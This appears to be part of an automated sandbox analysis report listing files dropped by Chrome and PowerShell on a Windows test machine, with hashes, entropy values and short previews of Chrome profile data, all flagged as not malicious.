                                                                                                                                                                                                                        SHA1:262A8B0086058E9DBF2FEBD30CFF4D30C11E6043
                                                                                                                                                                                                                        SHA-256:2FF434C858A9476E6425B08337AB6D035D1E9B156EDDBEBCD35A8EBADFB34E8C
                                                                                                                                                                                                                        SHA-512:731F79720FB643F4C51E3374E083642CCE846CAA61BC185E89887C5CF88B984E812565B10562E93F831FE5FD3E9D4520B5A60318B696C61CCFD5340D4800CFB0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:55.084 1b0c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2021/12/06-19:08:55.085 1b0c Recovering log #3.2021/12/06-19:08:55.086 1b0c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG.old (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):338
                                                                                                                                                                                                                        Entropy (8bit):5.2278007006470455
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPdxYo+q2PWXp+N23iKKdKfrzAdIFUtAPdxumWZmw2PdxPVkwOWXp+N23iKKdKS:uP5+va5Kk9FUtAPa/2PfV5f5Kk2J
                                                                                                                                                                                                                        MD5:71050F4520CC6F020D528D6E879B6EE9
                                                                                                                                                                                                                        SHA1:262A8B0086058E9DBF2FEBD30CFF4D30C11E6043
                                                                                                                                                                                                                        SHA-256:2FF434C858A9476E6425B08337AB6D035D1E9B156EDDBEBCD35A8EBADFB34E8C
                                                                                                                                                                                                                        SHA-512:731F79720FB643F4C51E3374E083642CCE846CAA61BC185E89887C5CF88B984E812565B10562E93F831FE5FD3E9D4520B5A60318B696C61CCFD5340D4800CFB0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:55.084 1b0c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2021/12/06-19:08:55.085 1b0c Recovering log #3.2021/12/06-19:08:55.086 1b0c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):106
                                                                                                                                                                                                                        Entropy (8bit):3.138546519832722
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:tbloIlrJ5ldQxl7aXVdJiG6R0RlAl:tbdlrnQxZaHIGi0R6l
                                                                                                                                                                                                                        MD5:DE9EF0C5BCC012A3A1131988DEE272D8
                                                                                                                                                                                                                        SHA1:FA9CCBDC969AC9E1474FCE773234B28D50951CD8
                                                                                                                                                                                                                        SHA-256:3615498FBEF408A96BF30E01C318DAC2D5451B054998119080E7FAAC5995F590
                                                                                                                                                                                                                        SHA-512:CEA946EBEADFE6BE65E33EDFF6C68953A84EC2E2410884E12F406CAC1E6C8A0793180433A7EF7CE097B24EA78A1FDBB4E3B3D9CDF1A827AB6FF5605DA3691724
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                        Entropy (8bit):2.8150724101159437
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Yx7:4
                                                                                                                                                                                                                        MD5:C422F72BA41F662A919ED0B70E5C3289
                                                                                                                                                                                                                        SHA1:AAD27C14B27F56B6E7C744A8EC5B1A7D767D7632
                                                                                                                                                                                                                        SHA-256:02E71EB4C587FEB7EE00CE8600F97411C2774C2FC34CB95B92D5538E7F30DA59
                                                                                                                                                                                                                        SHA-512:86010ED2B2EEBDCC5A8A076B37703669C294C6D1BFAAEA963E26A9C94B81B4C53EC765D9425E5B616159C43923F800A891F9B903659575DF02F8845521F8DC46
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 85.0.4183.121
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):189511
                                                                                                                                                                                                                        Entropy (8bit):6.045222825600431
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:H8jwrBc0i/fQWsL1on4cQBhCeAQTgJpI1fFcbXafIB0u1GOJmA3iuRG:cjwkXLsJeQBhCepsPmtaqfIlUOoSiuRG
                                                                                                                                                                                                                        MD5:DAC43F6C68D10D4B09DFF418FCB32275
                                                                                                                                                                                                                        SHA1:FA6590D2ADD97C6742FFC1C1AFE5DE10A17CE667
                                                                                                                                                                                                                        SHA-256:6AE48E46599BB286D41276C1845D2179BCBDF6D8A070DE5CFEEB6F18104361A9
                                                                                                                                                                                                                        SHA-512:9AE216AA60728F6D7542468D2D569F459890BFD44D6159CE9BD3C61DC03B2CE1899D2829BAF52D3A707DACFDE420BBB20C573A53A9C8E5AED4A7515B3F764260
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.638846531476059e+12,"network":1.638814133e+12,"ticks":151462001.0,"uncertainty":4024403.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799404391"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State4 (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):189605
                                                                                                                                                                                                                        Entropy (8bit):6.045488285632766
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:q8jwrBc0i/fQWsL1on4cQBhCeAQTgJpI1fFcbXafIB0u1GOJmA3iuRG:rjwkXLsJeQBhCepsPmtaqfIlUOoSiuRG
                                                                                                                                                                                                                        MD5:3FFD73F9E5718D722FF2012F1CD49DCF
                                                                                                                                                                                                                        SHA1:E23AFF0EFFDEE0DB365B5D2DB5B99B1C8835461E
                                                                                                                                                                                                                        SHA-256:7C8D9EDF38CE3AD6DB57FC16D62E41686CC9BC32729D689D2C36C8C4C3FC67B1
                                                                                                                                                                                                                        SHA-512:61543123BD8DF7B63552384EB9B45769867FA4107D0821D80CF2479407B97205C5A8E5DFF398B0D29E65721B9DE45F963A89361DF15421022C09ADC132175CFF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.638846531476059e+12,"network":1.638814133e+12,"ticks":151462001.0,"uncertainty":4024403.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799404391"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Local States (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):189511
                                                                                                                                                                                                                        Entropy (8bit):6.045222825600431
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:H8jwrBc0i/fQWsL1on4cQBhCeAQTgJpI1fFcbXafIB0u1GOJmA3iuRG:cjwkXLsJeQBhCepsPmtaqfIlUOoSiuRG
                                                                                                                                                                                                                        MD5:DAC43F6C68D10D4B09DFF418FCB32275
                                                                                                                                                                                                                        SHA1:FA6590D2ADD97C6742FFC1C1AFE5DE10A17CE667
                                                                                                                                                                                                                        SHA-256:6AE48E46599BB286D41276C1845D2179BCBDF6D8A070DE5CFEEB6F18104361A9
                                                                                                                                                                                                                        SHA-512:9AE216AA60728F6D7542468D2D569F459890BFD44D6159CE9BD3C61DC03B2CE1899D2829BAF52D3A707DACFDE420BBB20C573A53A9C8E5AED4A7515B3F764260
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.638846531476059e+12,"network":1.638814133e+12,"ticks":151462001.0,"uncertainty":4024403.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799404391"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):95428
                                                                                                                                                                                                                        Entropy (8bit):3.7425053390199685
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:V9JQfn9CcpWdBVOUD+N7rwvXN3AfVMHlkGcbr2hbfxwpx1Arq3my2IiNzTTcOxZU:LxGa11yZMcsezvRJYnH+VKPdT5a
                                                                                                                                                                                                                        MD5:2962389534DB7C2E8F194959F3C101B5
                                                                                                                                                                                                                        SHA1:2DC6429B9F0B5E727245CFE2B9F57348CD7B1130
                                                                                                                                                                                                                        SHA-256:6D60D6581FDA86B771D62E9FCA80B9A435EB5CD4DBE5E5CC7808F4FA36D10B92
                                                                                                                                                                                                                        SHA-512:E1BFF43BF98FE36016FA6B80DD0B8DB1DB774582D9E1F578790AD8659B44CEFA9997E96A0F7E010809B30D79D7040CF14534A42E1108E26B8E1454F0B519C118
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .t..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...SM8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info CacheMP (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:SysEx File -
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):94708
                                                                                                                                                                                                                        Entropy (8bit):3.7427683621330914
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:l9JQfn9CcpWdBVOUD+N7rwvXN3AfVMHlkGcbr2hbfxwpx1Arq3my1iNzTTcOxZ7F:7xGa11yZ0csezvRJYnH+VKPdT5D
                                                                                                                                                                                                                        MD5:A95E66E95D905D36656EBB64AE3D0C0E
                                                                                                                                                                                                                        SHA1:EDB90ABA546D0B49AF5D04D0D324760A6DF9862A
                                                                                                                                                                                                                        SHA-256:F8E19D6896EAECFD04F4593E4E3B56821F2A7F4F80BD53C0D880A9670E55A826
                                                                                                                                                                                                                        SHA-512:CAB90882A03A4317C0A400EC815FC5D23DD8D2C74BC5CCA1BF3185445683E3FB907138CFC0FE3C24237C9AA25BBAF3344D2E313AB4A22520810811EB441DF1E7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .q..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...SM8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\eed6ade0-4dfc-4b46-bb74-4cfdd21c3d03.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):197987
                                                                                                                                                                                                                        Entropy (8bit):6.074203398417346
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:8mjwkXLsJeQBhCepsPmtaqfIlUOoSiuRG:8mdXQJeECaChox
                                                                                                                                                                                                                        MD5:6512D2F26E38DB5F659DE90FFA439FA5
                                                                                                                                                                                                                        SHA1:30655ECFB3649684B46E4D809CBA175768C0A4D1
                                                                                                                                                                                                                        SHA-256:1C69AA180BBD4AEB5E50D36B440C31D8B4A5B80815D99C3A95F1F548EF207A92
                                                                                                                                                                                                                        SHA-512:CA7B3EF6DBB9D48658E67AD82243851B3D3874650E355511A106A00817E164C2E59E93D8C428184C8069D6F91D0B46D2F1D06B5F08A037202EE79365E7C02C02
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.638846531476059e+12,"network":1.638814133e+12,"ticks":151462001.0,"uncertainty":4024403.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\f4384c0a-104e-436b-8a04-034a4aaa55a9.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):95428
                                                                                                                                                                                                                        Entropy (8bit):3.7425053390199685
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:V9JQfn9CcpWdBVOUD+N7rwvXN3AfVMHlkGcbr2hbfxwpx1Arq3my2IiNzTTcOxZU:LxGa11yZMcsezvRJYnH+VKPdT5a
                                                                                                                                                                                                                        MD5:2962389534DB7C2E8F194959F3C101B5
                                                                                                                                                                                                                        SHA1:2DC6429B9F0B5E727245CFE2B9F57348CD7B1130
                                                                                                                                                                                                                        SHA-256:6D60D6581FDA86B771D62E9FCA80B9A435EB5CD4DBE5E5CC7808F4FA36D10B92
                                                                                                                                                                                                                        SHA-512:E1BFF43BF98FE36016FA6B80DD0B8DB1DB774582D9E1F578790AD8659B44CEFA9997E96A0F7E010809B30D79D7040CF14534A42E1108E26B8E1454F0B519C118
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .t..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...SM8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1464
                                                                                                                                                                                                                        Entropy (8bit):5.288330753428086
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:3YQrLAo4KAxX5qRPD42HEezoFe9t4CvKuKnKJYTx9rkv9ekLAl/:BrB4nqRL/HEekFe9t4Cv94aYTx9w9bu
                                                                                                                                                                                                                        MD5:830D7C609BD47A554F04933211AB7E7F
                                                                                                                                                                                                                        SHA1:B46765EDB4907BA72B7A42AC0730302F0D78B37E
                                                                                                                                                                                                                        SHA-256:0C5DDC8C171467DDB4D2AB6C2DB28858AE9BFE2DD38E40C87EAD9BA46521E761
                                                                                                                                                                                                                        SHA-512:66B52F9AE7667C1D9ECBC5C682C8B37480A46C0E2CF081AFCEA29BF347E369BF6A7E30C1861A96334B1B5D53B04E7F537015E208EF0848A6B69F4340737437A1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: @...e...........)....................................@..........@...............Z.y1k+.O.n7.k...(.......System.IO.Compression...H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..8................'....L..}............System.Numerics.4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\2337b61c-de69-4ace-ab09-3189e352c1e2.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\321ad580-a91d-4f0e-8123-ba9aa2851051.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\390e5361-2779-4cb3-acd8-4110dc8c167d.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):248531
                                                                                                                                                                                                                        Entropy (8bit):7.963657412635355
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:r+nmRykNgoldZ8GjJCiUXZSk+QSVh85PxEalRVHmcld9R6yYfEp4ABUGDcaKklrv:k3oF4Z4h45P99Fld9RBQYBVcaxlnfL
                                                                                                                                                                                                                        MD5:541F52E24FE1EF9F8E12377A6CCAE0C0
                                                                                                                                                                                                                        SHA1:189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
                                                                                                                                                                                                                        SHA-256:81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
                                                                                                                                                                                                                        SHA-512:D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
                                                                                                                                                                                                                        Malicious:false
